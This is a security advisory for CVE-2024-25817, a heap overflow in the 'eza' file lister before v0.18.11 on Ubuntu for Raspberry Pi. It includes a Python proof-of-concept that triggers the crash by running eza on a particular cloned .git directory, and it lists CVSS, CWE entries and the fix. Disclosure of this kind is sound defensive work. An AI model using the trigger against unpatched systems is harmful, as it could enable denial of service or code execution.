# Summary
In `eza` [^1] (before `v0.18.11`), there exists a heap overflow vulnerability, f
irst seen when using Ubuntu for Raspberry Pi series system, on `ubuntu-raspi` ke
rnel, relating to the `.git` directory.
# Details
The vulnerability seems to be triggered by the `.git` directory in some projects
. This issue may be related to specific files, and the directory structure also
plays a role in triggering the vulnerability. Files/folders that may be involved
in triggering the vulnerability include `.git/HEAD`, `.git/refs`, and `.git/obj
ects`.
# PoC - If you have Raspberry Pi 4B bare metal machine
**If you don't have Raspberry Pi bare metal, you can try emulate a ubuntu for ra
spberry system in virtual machine.**
You just need install any one of Ubuntu for Raspberry Pi series system in your b
are metal machine.
## Tested platform info
Configuration in `Raspberry Pi 4B` bare metal machine:
```bash
eza version: v0.18.10 [+git]
Linux lux 5.15.0-1049-raspi #52-Ubuntu SMP PREEMPT Thu Mar 14 08:39:42 UTC 2024
aarch64 aarch64 aarch64 GNU/Linux
Distributor ID: Ubuntu
Description: Ubuntu 22.04.4 LTS
Release: 22.04
Codename: jammy
```
> [!IMPORTANT]
> So far I have only tested the `Ubuntu 22.04.4 LTS Server` and confirmed that t
his vulnerability exists. I haven't test other System/Raspberry Pi yet.
## Steps
Install `eza (<=v0.18.10)` in Raspberry Pi. Process can refer to the official [w
iki](https://github.com/eza-community/eza/blob/main/INSTALL.md).
```python
#!/usr/bin/env python3
import os
import shutil
import subprocess
# Step 1: Clone the repository
repo_url = "https://github.com/umami-software/umami.git"
subprocess.run(["git", "clone", repo_url])
# Step 2: Checkout to the specific commit contain the special '.git' directory t
hat can trigger the vulnerability
repo_dir = "umami"
commit_hash = "a38baa5"
os.chdir(repo_dir)
subprocess.run(["git", "checkout", commit_hash])
# Step 3: Create a directory for the vulnerability related files
os.chdir("..")
os.mkdir("suspicious")
shutil.move(os.path.join(repo_dir, ".git"), "suspicious/.git")
# Step 4: Remove unrelated files/directories
shutil.rmtree(repo_dir)
# Step 5: Trigger the vulnerability
subprocess.run(["eza", "-l", "--git", "suspicious/.git"])
```
> [!NOTE]
> The picture shows my test environment. In actual testing, the vulnerability ca
n be triggered by just using the above script.
# Impact
Arbitrary code execution.
# Severity using CVSS
Severity: `High 8.4`<br />
Vector string: `CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
# Weaknesses
- Heap-based Buffer Overflow (CWE-122)
- Improper Restriction of Operations within the Bounds of a Memory Buffer
(CWE-119)
- Missing Release of Memory after Effective Lifetime (CWE-401)
- Improper Resource Shutdown or Release (CWE-404)
- Improper Initialization (CWE-665)
# GitHub Advisories
- GitHub Advisories.[^3]
# NIST
- National Vulnerability Database.[^4]
# Solution
Update eza to `0.18.11` or higher version.
# References
[^1]:
[eza](https://github.com/eza-community/eza/tree/main): A modern,
maintained replacement for ls.
[^3]: [GitHub Advisories](https://github.com/advisories/GHSA-3qx3-6hxr-j2ch)
[^4]: [CVE-2024-25817](https://nvd.nist.gov/vuln/detail/CVE-2024-25817)
